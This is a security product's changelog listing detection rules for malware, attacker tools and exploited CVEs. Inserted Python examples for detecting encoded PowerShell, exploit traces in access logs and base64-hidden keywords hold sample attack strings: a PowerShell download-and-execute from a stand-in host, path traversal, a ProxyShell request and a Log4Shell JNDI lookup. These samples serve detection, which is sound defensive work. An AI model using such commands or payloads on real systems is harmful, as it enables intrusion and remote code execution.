MITRE ATT&CK Analyzer changelog

This page tracks updates and changes to AIR's MITRE ATT&CK Analyzer.

10.2.0 (29/07/25)

Dynamo Analyzer

  • Enhanced identification of various hacker tool names commonly found in forensic evidence.

MITRE ATT&CK Analyzer / YARA

  • Improved detection of SharePoint server exploitation via CVE-2025-53770, including updated patterns for web logs, URI artifacts, and webshells.

  • Added detection for Donut shellcode loader and shellcode, enabling identification of position-independent shellcode used for stealthy in-memory execution of .NET assemblies and other payloads.

  • Expanded detection capabilities for Amadey malware version 5.34 through intrinsic pattern recognition and decryption algorithm identification.

  • Added rules to identify indicators common across multiple ESXi ransomware variants.

  • Introduced detection for Warlock ransomware across Windows and Linux platforms based on unique file and string patterns.

  • New detection for ToolShell, a .NET-based webshell used for system information gathering and cryptographic key extraction on Windows systems.

  • Added SharpAdidnsdump detection, a tool for dumping DNS records from Active Directory-integrated DNS zones.

  • Introduced detection of dynamic resolution of function addresses from msvcrt.dll, a technique used to evade detection.

  • Added detection for SharpHost, a tool that collects host system and network environment information.

  • Introduced detection for Python DLL sideloading attempts, highlighting suspicious Python libraries that may facilitate hijacking of execution flow.

  • Other smaller improvements include rule updates, quality of life enhancements, and fixes for false positives.

Sigma

  • Drone has been updated with the most recent Sigma rule updates from SigmaHQ and Hayabusa repositories.

10.1.0 (26/07/25)

Dynamo Analyzer

  • Improved detection of suspicious Windows scheduled tasks by expanding monitored command line path patterns.

  • Enhanced identification of various hacker tool names commonly found in forensic evidence.

MITRE ATT&CK Analyzer / YARA

  • Added new detections for APT Patchwork, including its shellcode loader, remote access trojan, and shellcode runner, to identify related malicious activity.

  • Extended Lazarus APT coverage with detections for RootTroy backdoor, malicious implant, trojan, and CryptoBot infostealer, alongside existing detections for RustBucket and other Lazarus malware variants.

  • Introduced detection of Nim-based binaries, covering Windows, Linux, and macOS platforms, to flag potentially suspicious executables that require further analysis.

  • Added detection for the RouterScan hack tool used for network service discovery and router enumeration.

  • Added detection for LNK files executing PowerShell commands with suspicious paths, and for LNK files with embedded URLs, highlighting potential initial access techniques.

  • Added detection for payloads created by the commercial evasion framework SHELLTER, commonly used to deploy post-exploitation payloads and evade antivirus and EDR solutions.

  • Other smaller improvements include rule updates, quality of life enhancements, and fixes for false positives.

Sigma

  • Drone has been updated with the most recent Sigma rule updates from SigmaHQ and Hayabusa repositories.

10.0.5 (22/07/25)

Sigma

  • Drone has been updated with the latest Sigma rule enhancements from the SigmaHQ and Hayabusa repositories, including detection for exploitation attempts of CVE-2025-53770.

10.0.4 (21/07/25)

MITRE ATT&CK Analyzer / YARA

  • Added detections for artifacts related to SharePoint server exploitation via CVE-2025-53770, including web log entries, URIs, and ASPX webshells (both source and compiled forms).

10.0.3 (18/07/25)

Dynamo Analyzer

  • Added detection for anomalous activity volume in HubSpot users by comparing recent activity to historical baselines.

  • Implemented identification of suspicious first-time user activities in HubSpot within the first day of account creation, focusing on potentially destructive or high-privilege actions.

  • Introduced detection for rapid successive actions in HubSpot audit logs, flagging potential automated or compromised account behavior based on action frequency and speed.

  • Created a comprehensive detector for suspicious activities in HubSpot audit logs, covering user management, API key management, data export, off-hours activity, authentication failures, and configuration changes.

  • Enhanced identification of various hacker tool names commonly found in forensic evidence.

  • Improved Windows Osquery detection by enriching WinSCP Host Key extraction with associated user information through joined registry and user datasets.

MITRE ATT&CK Analyzer / YARA

  • Added detection for RansomHub ransomware, a cross-platform threat known for aggressive encryption and ransom note deployment.

  • Added detection for the Veeamp credential dumping tool, targeting SQL databases used by Veeam backup management software.

  • Other smaller improvements include detection updates, quality-of-life enhancements, and fixes for false positives.

10.0.2 (15/07/25)

MITRE ATT&CK Analyzer / YARA

  • Improved detection of multiple native IIS malware families, including IIS-Raid variants, RGDoor, IIStealer, ISN, IISpy, IISerpent, and other groups targeting IIS servers.

  • Added identification of a malicious IIS module used in SEO poisoning attacks.

  • Refined detection logic to focus on filesystem context for better accuracy and reduced false positives.

  • Other smaller improvements include rule updates, quality-of-life enhancements, and fixes for false positives.

10.0.1 (15/07/25)

Dynamo Analyzer

  • Added detection for cached WinSCP host keys in the Windows registry, which may indicate unauthorized use of WinSCP for remote file transfers.

10.0.0 (14/07/25)

Dynamo Analyzer

  • Improved detection of scheduled tasks with suspicious extensions by adding exclusions for specific system paths.

  • Updated detection logic for services to better identify unusual paths used by adversaries.

  • Enhanced identification of various hacker tool names commonly found in forensic evidence.

MITRE ATT&CK Analyzer / YARA

  • Added detection for a tool demonstrating multiple methods for bypassing application whitelisting on Windows systems.

  • Included rules for identifying Office template injection exploits commonly used for defense evasion.

  • Enhanced detection capabilities for process injection indicators using common patterns.

  • Implemented identification measures for suspicious Cmdl32 usage, often leveraged as a LOLBin for stealthy command execution.

  • Developed a rule to detect the use of the SOAPHound tool, which is associated with Active Directory enumeration.

  • Updated Cobalt Strike beacon detection to include specific DLL characteristics.

  • Other smaller improvements include rule updates, quality-of-life enhancements, and fixes for false positives.

9.6.1 (30/06/25)

Dynamo Analyzer

  • Improved detection of suspicious service paths by including all fields in query results.

9.6.0 (30/06/25)

Dynamo Analyzer

  • Added comprehensive detection for Model Context Protocol (MCP) server activities on Windows endpoints, which includes configuration files, environment variables, network activity, processes, and installed programs. These detections aim to identify unauthorized access to AI assistants and potential data exfiltration capabilities.

MITRE ATT&CK Analyzer / YARA

  • Implemented detection for various native IIS malware families, including IIS-Raid derivatives, RGDoor, IIStealer, ISN, IISpy, IISerpent, and others. Each detection targets specific characteristics of the respective malware family.

  • Updated detection rule for samples protected by the ConfuserEx protector, enhancing identification accuracy.

  • Other smaller improvements include rule updates, quality-of-life enhancements, and fixes for false positives.

9.5.0 (04/07/25)

YARA

  • Added detection for KoiLoader/KoiStealer malware.

  • Added detection for various documented hacker tools used by threat actors in recent operations.

  • Quality of life and false positive fixes.

  • Added many other smaller rules for detecting various Initial Access IOCs.

Dynamo

  • Updated the list of various hacker tools commonly found in forensic evidence.

9.2.2 (07/05/25)

YARA

  • Added detection for Python-based Anubis backdoor used by FIN7, a financially motivated threat group.

  • Added detection for QDoor backdoor.

  • Added detection for SectopRAT, aka ArechClient2.

  • Added detection for Lazarus APT BeaverTail malware and its infostealer component.

  • Added detection for a new variant of the Stealc stealer.

  • Added detection for EarthKurma APT Dunloader backdoor.

Dynamo

  • Added identification of risky Windows Registry settings such as enabled RDP, enabled vulnerable SMB, usage of unencrypted WDigest protocol, and more.

9.0.1 (02/04/25)

YARA

  • Updated detection of SystemBC multiplatform proxy malware.

  • Updated detection of the Play ransomware variant and the tools used by this threat actor.

  • Other small fixes and improvements.

9.0.0 (02/04/25)

YARA

  • Added detection for HUI Loader that has been used since at least 2015 by China-based threat groups, including Cinnamon Tempest and menuPass, to deploy malware on compromised hosts. (S1097)

  • Added detection for ShadowPad backdoor. ShadowPad is a well-known and privately sold modular backdoor, known to only be supplied to China-aligned APT groups. (S0596)

  • Added detection for SodaMaster that has been used by Chinese threat actors to download and execute payloads since at least 2020. (S0627)

  • Added detection for the SparrowDoor backdoor linked to the Chinese FamousSparrow threat actor.

  • Added detection for the ABYSSWORKER rootkit driver, deployed to blind EDR products from multiple vendors.

  • Enhanced detection of samples using compromised/revoked digital signatures.

  • Added detection for various tools used for credentials stealing, brute force, network discovery, and reverse proxy techniques.

  • Many other smaller fixes and improvements.

Dynamo

  • Enhanced identification of the latest hacker tool names found in forensic evidence that are commonly used in attacks.

8.7.0 - 8.7.1 (05/03/25)

YARA

  • Added detection for the Winos command-and-control framework, whose latest campaign targets users in Taiwan.

  • Improved detection of ransomware variants targeting the ESXi platform.

  • Added detection for Sosano backdoor, targeting organizations with a distinct interest in aviation and satellite communications, along with critical transportation infrastructure.

8.6.3 (03/03/25)

YARA

  • Added detection for Sagerunex backdoor attributed to Lotus Blossom APT. (G0030)

8.6.2 (03/03/25)

YARA

  • Added detection for Lazarus APT attributed InvisibleFerret and BeaverTail malware variants. (G0032)

  • Enhanced detection of malicious samples targeting crypto-related browser extensions.

8.6.1 (03/03/25)

YARA

  • Improved detection of the Windows variant of LightSpy, attributed to the China-linked APT41 group. (G0096)

  • Added detection for macOS variant of malware dubbed Rustdoor, possibly linked with notorious Windows ransomware groups.

8.6.0 (26/02/25)

YARA

  • Added detection for Gh0st RAT, a remote access trojan with a long history of use in intrusions against sensitive networks. (S0032)

  • Added detection for macOS-capable ransomware with exfiltration capabilities that masquerades as LockBit. (T1486)

  • Enhanced detection of vulnerable drivers used for privilege escalation and defense evasion purposes. (T1068)

Dynamo

  • Enhanced identification of forensic evidence where PowerShell executed encoded content. (T1027.010)
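The encoded-PowerShell detection above (like the base64 PowerShell items in 5.6.2 and 5.5.0 further down) rests on one decoding step: an `-EncodedCommand` payload is base64 over UTF-16LE text, so the real script is only visible after both layers are undone. The following is an added example, not AIR's own detection logic: it finds the encoded-command switch on a command line, decodes the payload, and flags suspicious keywords in the decoded script and suspicious switches on the outer command line. The sample command lines are constructed here, and the keyword and flag lists are illustrative choices of this example rather than the product's rules.

```python
import base64
import binascii
from typing import Optional

# Keywords looked for in the decoded script (illustrative list, lower-case).
SUSPICIOUS_KEYWORDS = (
    "iex", "invoke-expression", "downloadstring", "downloadfile",
    "invoke-webrequest", "net.webclient", "frombase64string",
    "reflection.assembly", "bypass",
)
# Switch combinations on the outer command line that usually accompany loaders.
SUSPICIOUS_FLAGS = (
    "-nop", "-noprofile", "-noni", "-noninteractive",
    "-w hidden", "-windowstyle hidden", "-ep bypass", "-executionpolicy bypass",
)


def encode_ps(script: str) -> str:
    """Build an -EncodedCommand payload the way powershell.exe expects it
    (base64 of the UTF-16LE script). Used here only to construct samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines (not taken from real evidence).
SAMPLE_COMMANDS = [
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "powershell.exe -nop -w hidden -enc "
    + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"),
    "powershell -EncodedCommand " + encode_ps("Get-Process | Out-File C:\\temp\\procs.txt"),
]


def is_encoded_switch(token: str) -> bool:
    """powershell.exe accepts -e and -ec, plus any prefix of -EncodedCommand
    of two or more characters (-en, -enc, -encoded, ...)."""
    if not token or token[0] not in "-/":
        return False
    name = token[1:].lower()
    return name in ("e", "ec") or (len(name) >= 2 and "encodedcommand".startswith(name))


def decode_encoded_command(payload: str) -> Optional[str]:
    """Base64-decode the payload and interpret it as UTF-16LE.
    Returns None when the payload is not valid base64 or not valid UTF-16LE,
    which is also what happens for an -ExecutionPolicy value such as 'Bypass'."""
    try:
        raw = base64.b64decode(payload, validate=True)
        return raw.decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyse_command(cmdline: str) -> dict:
    """Locate an encoded command, decode it and collect keyword/flag hits."""
    tokens = cmdline.split()
    payload = None
    for i, tok in enumerate(tokens[:-1]):          # the payload is the token after the switch
        if is_encoded_switch(tok):
            payload = tokens[i + 1]
            break
    decoded = decode_encoded_command(payload) if payload else None
    text = (decoded or "").lower()
    hits = sorted(k for k in SUSPICIOUS_KEYWORDS if k in text)
    flags = sorted(f for f in SUSPICIOUS_FLAGS if f in cmdline.lower())
    return {
        "encoded": decoded is not None,
        "decoded": decoded,
        "hits": hits,
        "flags": flags,
        # Encoded content alone is not malicious; require a keyword or flag hit as well.
        "suspicious": decoded is not None and bool(hits or flags),
    }


if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        r = analyse_command(cmd)
        print(f"suspicious={r['suspicious']} encoded={r['encoded']} hits={r['hits']} flags={r['flags']}")
        if r["decoded"]:
            print("   decoded:", r["decoded"])
```

The verdict deliberately requires more than the presence of encoding: administrators and scheduled jobs use `-EncodedCommand` legitimately, so the third sample decodes cleanly but is not flagged, while the second is flagged on both the decoded `DownloadString`/`IEX` content and the `-nop -w hidden` switches.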

8.5.1 (12/02/25)

YARA

  • Minor fixes.

8.5.0 (11/02/25)

YARA

  • Added detection for a custom backdoor used in the Lazarus-attributed DeceptiveDevelopment campaign, which spreads via fake job offers. (G0032)

  • Added detection for hack tools used for dumping Veeam credentials stored in MSSQL databases. (T1555)

  • Added detection for ValleyRAT backdoor attributed to Silver Fox cybercrime group.

  • Other small fixes and improvements.

Dynamo

  • Enhanced identification of hack tools found in forensic evidence.

8.4.0 (26/01/25)

YARA

  • Minor fixes.

8.3.0 (26/01/25)

YARA

  • Minor fixes.

8.2.4 (30/12/24)

YARA

  • Added detection for malicious extensions involved in the Cyberhaven compromise and a broader campaign targeting Chrome extensions for credential-stealing purposes.

8.2.0 (26/12/24)

YARA

  • FP fixes and verdict improvements.

8.1.0 (26/12/24)

YARA

  • Improved access log detection: matches now show the entire log line instead of only the matched string of interest.

  • Added detection for BrazenBamboo APT.

  • FP fixes

Dynamo

  • HTML smuggling improvement and FP fixes.

  • Improved description of rules.

8.0.2 (04/12/24)

YARA

  • Added detection for the GHOSTSPIDER backdoor, attributed to the Chinese Earth Estries APT group, which primarily targets critical industries such as telecommunications and government entities.

  • Added detection for Pygmy Goat, which was discovered on Sophos XG firewall devices, providing backdoor access to the device.

8.0.1 (28/11/24)

YARA

  • Added detection for STEALHOOK, an exfiltration tool used by OilRig (APT34) group. (G0049)

  • Added detection for tools designed to exploit CVE-2024-30088, a Windows Kernel elevation of privilege vulnerability. (T1068)

8.0.0 (28/11/24)

YARA

  • Enhanced identification of vulnerable and malicious drivers weaponized by threat actors for defense evasion purposes. (T1068)

  • Added detection for EDRSandblast, a hack tool designed to bypass EDR detection. (T1562)

  • Enhanced detection of various tools used by threat actors for Credentials Access, Discovery, Lateral Movement, and other TTPs.

7.3.0 (28/11/24)

YARA

  • Added detection for Medusa ransomware.

  • Added detection for Ymir ransomware.

  • YARA rules that scan access logs for signs of exploitation attempts now report the entire line where suspicious activity was detected.

  • Added detection for RDP configuration files that include unusual sets of permissions such as access to audio, disks, and the clipboard. (T1219)

  • Added detection for various hack tools designed to extract passwords from password stores. (T1555)
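Reporting the whole access-log line rather than only the matched substring matters because the client IP, timestamp, status code and user agent around the hit are what an analyst pivots on. As an added illustration (not the product's YARA rules), the scanner below URL-decodes each line twice so single- and double-encoded payloads are visible, applies a few simplified exploitation patterns, and returns the full original line for every hit. The sample log lines are constructed for this example and the three patterns are deliberate approximations, not the rules the changelog refers to.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format access log lines (not from any real server).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Nov/2024:10:01:22 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Nov/2024:10:02:10 +0000] "GET /static/..%2f..%2f..%2fetc/passwd HTTP/1.1" 404 512 "-" "curl/8.0"
203.0.113.7 - - [12/Nov/2024:10:03:41 +0000] "POST /autodiscover/autodiscover.json?@evil.example/powershell HTTP/1.1" 200 4096 "-" "python-requests/2.31"
198.51.100.4 - - [12/Nov/2024:10:04:05 +0000] "GET /login HTTP/1.1" 200 300 "-" "${jndi:ldap://198.51.100.4:1389/a}"
"""

# Rule name -> pattern applied to the URL-decoded line. These are simplified
# signatures chosen for this example: '../' after decoding, the '@' trick in a
# ProxyShell autodiscover URL, and a JNDI lookup string anywhere on the line
# (here it sits in the User-Agent field, which is why the whole line is scanned).
RULES = {
    "path_traversal": re.compile(r"\.\.(?:/|\\)"),
    "proxyshell_autodiscover": re.compile(r"/autodiscover/autodiscover\.json[^\s\"]*@", re.IGNORECASE),
    "log4shell_jndi": re.compile(r"\$\{jndi:", re.IGNORECASE),
}


def normalise(line: str) -> str:
    """URL-decode twice so %2f and double-encoded %252e both become visible."""
    return unquote(unquote(line))


def scan_access_log(text: str) -> list:
    """Return one finding per (line, rule) hit, carrying the full original line."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        decoded = normalise(raw)
        for rule, pattern in RULES.items():
            if pattern.search(decoded):
                findings.append({"line_no": line_no, "rule": rule, "line": raw})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"line {f['line_no']} [{f['rule']}]: {f['line']}")
```

Matching runs on the decoded text but the finding carries the raw line, so the report preserves exactly what the server logged, including the encoding the attacker chose.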

7.2.0 (28/10/24)

YARA

  • Added detection for BianLian ransomware. (T1486)

  • Enhanced identification of credential stealers that collect browser data. (T1005)

  • Enhanced detection of Cobalt Strike. (S0154)

  • Enhanced detection of memory dumpers and scripts designed to extract and decrypt Kerberos tickets. (T1558)

7.1.0 (18/10/24)

YARA

  • Added detection for DragonForce ransomware binaries. (T1486)

  • Added detection for Angry IP Scanner. (T1018)

7.0.0 (18/10/24)

YARA

  • Added detection for Clop and MedusaLocker ransomware binaries observed in September 2024. (TA0040)

  • Enhanced detection of the Defender Control hack tool often used to disable Microsoft Defender. (T1562.001)

  • Added detection for HRSword, which threat actors use for defense evasion. (T1562)

  • Multiple minor FP fixes and performance improvements.

6.3.1 (08/08/24)

YARA

  • Added detection for Bugsleep backdoor attributed to the Iranian MuddyWater threat actor.

6.3.0 (07/08/24)

YARA

  • Added detection for Java-based STRRAT and related IOCs.

  • Added detection for APT group dubbed StormBamboo/Evasive Panda that compromised an internet service provider (ISP) in order to poison DNS responses for target organizations.

6.2.0 (07/08/24)

YARA

  • Andariel/Lazarus IOCs update. (G0138, G0032)

  • Added detection for Maui ransomware.

6.1.1 (07/08/24)

YARA

  • Andariel IOCs update. (G0138)

  • Improved detection of Metasploit implants for Linux.

6.1.0 (07/08/24)

YARA

  • Added detection for IOCs attributed to the North Korean Lazarus/Andariel groups outlined in a CISA report. (G0032, G0138)

  • Added detection for open-source Lilith RAT. (T1219)

6.0.0 (07/08/24)

YARA

  • Improved detection of Shellcode loaders.

  • Added detection for the SharpSploit post-exploitation tool.

  • Other minor fixes and improvements.

5.7.0 (17/07/24)

YARA

  • Added detection for Pirpi backdoor attributed to the Chinese APT3 group. (G0022)

  • Added detection for IOCs used in the latest attacks by the APT41 group. (G0096)

  • Added detection for Internet Shortcut (.url) files exploiting CVE-2024-38112.

5.6.2 (17/07/24)

Sigma

  • Improved detection of PowerShell processes using base64 obfuscation.

5.6.1 (17/07/24)

Dynamo

  • Improved detection of CobaltStrike service installation.

5.6.0 (17/07/24)

YARA

  • Added detection for known malicious VSCode extensions.

  • Improved detection of successful ProxyShell exploitation found in server logs.

  • Various quality of life and FP fixes.

5.5.2 (17/07/24)

YARA

  • Improved detection of ASPX compiled DLL webshells.

5.5.1 (17/07/24)

YARA

  • Added lsass exclusion for memory scanning. (internal only changelog)

5.5.0 (17/07/24)

YARA

  • Added detection for malware known as DISGOMOJI, taking advantage of emojis for C2 communication.

  • Added detection for the Durian backdoor attributed to the Kimsuky APT group. (G0094)

  • Added detection for BadSpace backdoor.

  • Various quality of life and FP fixes.

Dynamo

  • Improved detection of Registry Run entries and Scheduled Tasks with base64 encoded PowerShell keyword.

5.4.0 (10/06/24)

YARA

  • Added detection for exploitation attempt indicators of a critical argument injection vulnerability in PHP (CVE-2024-4577).

  • Added detection for BitRAT backdoor.

  • Added detection for OrcusRAT backdoor.

  • Added detection for LightSpy malware targeting macOS.

  • Improved identification of path traversal indicators in server logs that suggest exploitation attempts.

  • Improved detection of .NET obfuscated/protected binaries.

5.3.1 (31/05/24)

YARA

  • Updated the list of path traversal patterns.

5.3.0 (31/05/24)

YARA

  • Added detection for CrimsonRAT. (S0115)

  • Improved detection of the IcedID Trojan. (S0483)

  • Improved detection of ISO archives with hidden scripts and signs of DLL Side-loading technique. (T1574.002)

  • Added detection for the Mythic C2 framework agent.

Dynamo/osquery

  • Added identification of possible ARP poisoning/spoofing.

5.2.0 (22/05/24)

YARA

  • Added detection for DiceLoader trojan attributed to FIN7. (G0046)

  • Added detection for Ebury botnet. (S0377)

  • Added detection for Latrodectus trojan. (T1218.011, T1055, T1053.005, T1070.004, T1059.003)

  • Added detection for macOS Cuckoo and Atomic stealer. (T1059.002, T1555)

  • Enhanced detection for the Reflective Code Loading technique. (T1620)

  • Enhanced detection of Powershell based loaders. (T1059.001)

  • Added detection for Kinsing miner. (S0599)

  • Improved identification of vulnerable and malicious drivers used for privilege escalation. (T1068)

  • Various other fixes and improvements.

Dynamo

  • Enhanced detection of network discovery and PowerShell commands in forensic evidence.

5.1.2 (17/05/24)

YARA

  • Improved detection of the Metasploit framework.

  • Added detection of masqueraded Lua-based samples. (T1036.008)

  • Added detection for the GooseEgg hack tool, which is used for privilege escalation and credential access, attributed to APT28. (G0007)

5.1.1 (17/05/24)

YARA

  • Added detection for Rawdoor, a backdoor attributed to Chinese APT31 group. (G0128)

  • Added detection for CR4T backdoor discovered in campaign targeting government entities in the Middle East.

  • Improved detection of Pupy, an open-source cross-platform C2 and post-exploitation framework regularly used by various threat actors.

  • Improved detection of Linux-based webshells. (T1505.003)

  • Improved detection of ZIP archives with indicators of the DLL sideloading technique. (T1574.002, T1566)

5.1.0 (18/04/24)

YARA

  • Added detection for Kapeka backdoor attributed to Sandworm APT44 group. (G0034)

  • Improved/added detection of various malware such as DarkGate, Nitrogen, FatalRAT, WikiLoader.

  • Added detection for IOCs related to GlobalProtect CVE-2024-3400.

  • Improved detection of Python-based loaders. (T1059.006)

  • Improved detection of various shellcode implants e.g. Metasploit-based. (T1620)

  • Added detection for IOCs masqueraded as certificates. (T1036.008, T1027)

  • Improved detection of obfuscated Javascript-based droppers, suspicious base64 encoded IOCs, and PowerShell-based loaders. (T1620, T1059.001, T1059.007, T1027)

  • And many other smaller improvements.

5.0.2 (18/04/24)

Sigma

  • PowerShell detection update.

5.0.1 (11/04/24)

YARA

  • Vidar stealer FP fix.

5.0.0 (09/04/24)

YARA

  • Added detection for Linux local privilege escalation exploit for CVE-2024-1086.

  • Added detection for various APT groups related IOCs, including APT28, APT29, APT33, and APT42. (G1006, G0007, G0016, G0064, G0059)

  • Added detection for DarkCrystal RAT (DCRat).

  • Added detection for Sharpire post-exploitation agent. (S0363)

  • Enhanced detection of obfuscated Golang-based binaries. (T1027)

  • Enhanced detection of Nim-based binaries.

  • Enhanced detection of RMM tools and software. (T1219)

  • Enhanced identification of misplaced binaries commonly used for DLL side-loading. (T1574.002)

  • Enhanced identification of potentially misplaced script-based samples commonly used for masquerading purposes. (T1036.005)

  • Enhanced identification of samples abusing double extension to trick users into executing malicious files. (T1036.007)

Dynamo

  • Enhanced detection of various hacker commands found in areas such as PowerShell commands, console, and console history.

  • Vastly improved detection of RMM software commonly abused by malicious actors. (T1219)

4.3.1 (01/04/24)

YARA

  • Added detection for backdoored binaries and indicators of compromise found in XZ Utils 5.6.0 and 5.6.1. (CVE-2024-3094)

4.3.0 (22/03/24)

YARA

  • Added detection for Xdealer malware attributed to the China-nexus threat actor tracked as Earth Lusca. (G1006)

  • Added detection for custom malware dubbed DinodasRAT targeting government organizations. (G1006)

  • Added detection for binaries signed by a D2innovation certificate attributed to the Kimsuky APT group. (G0094)

  • Added detection for Lumma information stealer (aka LummaC2 Stealer). (T1082, T1622, T1140, T1562, T1119, T1005, T1071, T1020)

  • Added detection for Meduza info stealer. (T1614, T1082, T1113, T1552, T1571)

  • Added detection for indicators found in compiled ASPX Web Shell DLLs. (T1505.003)

  • Enhanced detection of samples having a suspicious keyword in their PDB path (e.g. Trojan, Shellcode). (TA0005)

  • Enhanced detection of Remote Access Software Tools commonly used in ransomware attacks. (T1219)

  • Enhanced detection of misplaced files masquerading as legitimate Windows binaries. (T1036.005)

  • Enhanced detection of malicious samples and scripts obfuscated with XOR, AES and custom encoding. (T1027)

  • Enhanced detection of samples abusing double extension in order to hide true file type. (T1036.007)

  • Enhanced detection of LNK files executing suspicious PowerShell commands. (T1059.001, T1204.002)

  • Enhanced detection of older exploits such as Zerologon, BlueKeep and more. (T1021, T1068)

  • Various other rules, fixes and performance improvements.

Dynamo

  • Updated Hacker Tool list with new keywords for hunting in forensic artifacts such as Applications, Cronjobs, Downloads, MFT, Prefetch, Processes, Registry, Scheduled Tasks, Services, ShellBags, Shell History, and Shimcache. (T1588.002)

  • Updated detections of Remote Management Software Website domains in DNS Cache, indicating potentially unwanted usage of remote access software. (T1219)

4.2.3 (05/03/24)

YARA

  • Added detection for indicators of exploitation attempts against two recent JetBrains TeamCity authentication bypass vulnerabilities. (CVE-2024-27198 and CVE-2024-27199)

  • Added detection for the Linux variant of Bifrost (aka Bifrose). Bifrost is a remote access Trojan (RAT) that allows an attacker to gather sensitive information, like hostname and IP address. (T1219)

  • Added detection for Xeno RAT, a feature-rich open-source RAT freely available on GitHub. (T1059.003, T1053.005, T1622, T1497, T1055, T1071.00)

  • Added detection for suspicious unsigned executables protected with Obsidium protector. (T1027.002)

  • Added detection for FudModule rootkit exploiting CVE-2024-21338 kernel elevation of privilege vulnerability. (T1068)

  • Enhanced detection of files found outside their default location, a common way of hiding malicious files under the name of a legitimate Windows component. (T1036.005)

  • Enhanced detection of CobaltStrike beacons. (S0154)

4.2.2 (27/02/24)

YARA

  • Added detection for indicators of compromise, indicating exploitation attempts of two recent vulnerabilities in ConnectWise ScreenConnect. (CVE-2024-1709 & CVE-2024-1708)

4.2.1 (24/02/24)

YARA

  • Restored %WINDIR%\Temp to depth 2 recursion for now.

4.2.0 (23/02/24)

YARA

  • Restored memory scan [INTERNAL USAGE detail]

  • Added detection for the latest TinyTurla IOCs. (G0010)

  • Improved detection of Linux Shell scripts commonly used in malicious attacks. Examples include log removal, public DNS insertion, manipulation of root SSH keys, and other post-exploitation commands.

  • Enhanced detection of various hack tools mentioned in the latest malware campaigns.

4.1.0 (20/02/24)

YARA

  • Added detection for emails exploiting the Microsoft Outlook CVE-2024-21413 vulnerability.

  • Enhanced detection of the Sliver red team framework implant. (S0633)

  • Added detection for IOCs abusing the Mockbin service for malicious purposes. (T1090.004, T1102)

  • Added detection for IOCs designed to capture NTLMv2 hashes. (T1187)

  • Enhanced detection of binaries named after legitimate Windows executables for masquerading and defense evasion purposes. (T1036.005)

  • Enhanced detection of IOCs with base64 encoded keywords such as Powershell, WScript, and many more. (T1027)

  • Enhanced detection of ESXi ransomware variants. (TA0040)

  • Enhanced detection for many other IOCs with references to suspicious locations and suspicious commands, such as disabling UAC, enabling RDP, and more. (T1562.001, T1059.001, T1021.001, T1112)

  • Various other fixes and performance improvements.
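The base64-keyword item above relies on a property of the encoding that is easy to get wrong: the base64 text for a substring depends on the substring's byte offset modulo 3 inside the stream, so a single literal such as the encoding of "powershell" misses two thirds of occurrences. A detector must search for all three alignments, trimming the characters that mix in bytes before or after the keyword; this is what YARA's `base64` string modifier generates for a string. The code below is an added example, not the product's rules: it derives the three variants itself and checks them against constructed samples in which the same command is encoded at each alignment.

```python
import base64


def base64_variants(keyword: bytes) -> list:
    """Return the three base64 encodings of `keyword`, one per alignment
    (offset mod 3) at which it can sit inside a base64 stream. Characters that
    depend on the bytes before or after the keyword are trimmed, so each
    variant is a fixed substring regardless of surrounding content."""
    variants = []
    for pad in range(3):
        enc = base64.b64encode(b"\x00" * pad + keyword).rstrip(b"=")
        # Leading characters contaminated by the pad bytes: 0, 2 or 3 for pad 0, 1, 2.
        lead = (0, 2, 3)[pad]
        # If the last 3-byte group is incomplete, its final character also
        # encodes bits of whatever byte follows the keyword; drop it.
        if (pad + len(keyword)) % 3:
            enc = enc[:-1]
        variants.append(enc[lead:])
    return variants


def find_base64_keywords(data: bytes, keywords) -> set:
    """Report which keywords appear base64-encoded anywhere in `data`."""
    found = set()
    for kw in keywords:
        if any(v and v in data for v in base64_variants(kw)):
            found.add(kw.decode())
    return found


# Keywords to hunt for in encoded form (illustrative list).
KEYWORDS = [b"powershell", b"wscript", b"cmd.exe"]

# Constructed samples: the same command base64-encoded at each of the three
# alignments, plus a benign encoded string. One-byte and two-byte prefixes
# shift the keyword to offset 1 and 2 respectively.
COMMAND = b"powershell.exe -nop -w hidden -c calc"
SAMPLES = {
    "offset0": base64.b64encode(COMMAND),
    "offset1": base64.b64encode(b"x" + COMMAND),
    "offset2": base64.b64encode(b"xy" + COMMAND),
    "benign": base64.b64encode(b"notepad.exe C:\\notes.txt"),
}


if __name__ == "__main__":
    for kw in KEYWORDS:
        print(kw.decode(), "->", [v.decode() for v in base64_variants(kw)])
    for name, blob in SAMPLES.items():
        print(name, find_base64_keywords(blob, KEYWORDS))
```

Only the alignment-0 variant (`cG93ZXJzaGVsb` for "powershell") would be found by a naive rule; the offset1 and offset2 samples are matched solely by the other two variants. Very short keywords produce variants of only a few characters and should be avoided in rules because they match by chance.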

Dynamo

  • Added detection for Crypto Mining Pool Address in DNS Cache and Browser History. (T1496)

  • Added detection for registry run entries executing PowerShell command to read data stored in Registry. (T1547.001, T1059.001)

  • Added detection for registry run entries executing suspicious PowerShell commands. (T1547.001, T1059.001)

  • Updated list of Widely Abused Top-Level Domains found in DNS Cache. (T1583.001)

  • Updated Hacker Tool list with over 100 new keywords for hunting in forensic artifacts such as Applications, Cronjobs, Downloads, MFT, Prefetch, Processes, Registry, Scheduled Tasks, Services, ShellBags, Shell History, and Shimcache. (T1588.002)

  • Updated detections for hunting Large File Transfer Websites in DNS Cache, which can be used for uploading sensitive/confidential data. (T1567.002)

4.0.1 (05/02/24)

YARA

  • Added detection for C# and dictionary-based webshells.

  • Enhanced detection of JSP webshells.

  • Enhanced detection of directory traversal and XSS injection indicators found in server logs.

  • Enhanced detection of ProxyShell and ProxyNotShell exploitation indicators.

  • Added detection of various Linux exploits.

  • Updated the list of vulnerable and malicious drivers from the LOLDrivers project.

  • Added detection for binaries using potentially compromised AnyDesk certificate.

  • Other minor fixes.

Dynamo

  • Minor FP fixes.

3.5.2 (22/01/24)

YARA

  • Added more detection rules for IOCs observed in the exploitation of Ivanti VPN. (CVE-2023-46805 and CVE-2024-21887)

